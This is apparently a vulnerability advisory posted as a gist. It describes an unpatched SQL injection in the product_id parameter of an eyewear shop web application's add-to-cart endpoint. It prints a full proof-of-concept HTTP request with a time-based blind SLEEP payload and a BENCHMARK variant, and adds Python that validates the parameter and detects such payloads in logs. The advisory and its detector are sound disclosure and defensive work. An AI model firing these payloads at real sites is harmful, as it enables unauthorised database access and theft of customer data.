
@higordiego
Created October 13, 2024 20:51

Affected Version:

  • Online Eyewear Shop Website: 1.0

Vulnerability Information:

  • Vulnerability Type: SQL Injection
  • Severity: CRITICAL
  • Status: Unpatched

Vulnerable Endpoint:

  • classes/Master.php?f=add_to_card

Vulnerability Description:

A critical SQL injection vulnerability has been identified in the "Add to Cart" feature of the Online Eyewear Shop Website version 1.0. The flaw is triggered through the product_id parameter sent via a POST request to the endpoint classes/Master.php?f=add_to_card. Attackers can manipulate the product_id input to execute arbitrary SQL commands, leading to unauthorized access and potential data breaches.

This vulnerability compromises the backend database, allowing attackers to extract sensitive information or disrupt normal operations. As there is no patch available, the risk remains critical.


Proof of Concept (PoC):

Below is an example of a malicious POST request exploiting the SQL injection vulnerability by tampering with the product_id parameter:

POST /classes/Master.php?f=add_to_card HTTP/1.1
Host: localhost:8080
Content-Length: 66
sec-ch-ua-platform: "Linux"
Accept-Language: pt-BR,pt;q=0.9
sec-ch-ua: "Chromium";v="129", "Not=A?Brand";v="8"
sec-ch-ua-mobile: ?0
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://localhost:8080
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost:8080/?p=products/view_product&id=1
Accept-Encoding: gzip, deflate, br
Cookie: PHPSESSID=48068ce7875c00d88ca3aa2b9269b91f;
Connection: keep-alive

product_id=1' AND (SELECT 3879 FROM (SELECT(SLEEP(5)))odXD)-- XSxt
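
As an added defensive example (not part of the advisory or the application's code), the following Python applies to captured form bodies for this endpoint the two checks a defender wants: the allow-list the server should enforce on product_id (a positive integer and nothing else), and a detector for the time-based blind pattern used in the PoC. The sample bodies are constructed; the second one is the payload from the request above.

```python
import re
from urllib.parse import parse_qs

# Constructed sample form bodies, as they would appear in a proxy or
# application log for POST /classes/Master.php?f=add_to_card.
SAMPLE_BODIES = [
    "product_id=1",                                                        # legitimate request
    "product_id=1' AND (SELECT 3879 FROM (SELECT(SLEEP(5)))odXD)-- XSxt",  # payload from the PoC above
    "product_id=1 AND BENCHMARK(5000000,MD5(1))",                          # constructed, same class
    "product_id=abc",                                                      # malformed, not an injection
]

# Indicators of time-based blind SQL injection against MySQL.
TIME_BASED_PATTERNS = [
    re.compile(r"\bSLEEP\s*\(", re.IGNORECASE),
    re.compile(r"\bBENCHMARK\s*\(", re.IGNORECASE),
]
# A quote followed by a comment terminator is the classic way to close the
# original literal and discard the rest of the query.
COMMENT_TERMINATOR = re.compile(r"(--\s|#|/\*)")


def product_id_is_valid(raw):
    """Server-side allow-list: product_id must be a positive integer, nothing else."""
    return re.fullmatch(r"[1-9][0-9]*", raw) is not None


def classify_body(body):
    """Return (verdict, product_id) for one form body.

    verdict is 'ok' for a well-formed value, 'sqli_time_based' when the value
    carries a time-delay primitive or a quote+comment break-out, and 'reject'
    for any other value that fails the allow-list.
    """
    params = parse_qs(body, keep_blank_values=True)
    pid = params.get("product_id", [""])[0]
    if product_id_is_valid(pid):
        return "ok", pid
    if any(p.search(pid) for p in TIME_BASED_PATTERNS) or (
        "'" in pid and COMMENT_TERMINATOR.search(pid)
    ):
        return "sqli_time_based", pid
    return "reject", pid


def scan_bodies(bodies):
    """Count verdicts over a batch of captured bodies (for an alerting summary)."""
    counts = {"ok": 0, "reject": 0, "sqli_time_based": 0}
    for body in bodies:
        counts[classify_body(body)[0]] += 1
    return counts
```

The allow-list alone is what the endpoint should enforce before any query runs; the detector is for reviewing logs of requests the unpatched version already accepted.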

Burp Suite Requests:

  • Burp Suite PoC 1
  • Burp Suite PoC 2

SQLMap Exploit:

  • SQLMap PoC

External Links:
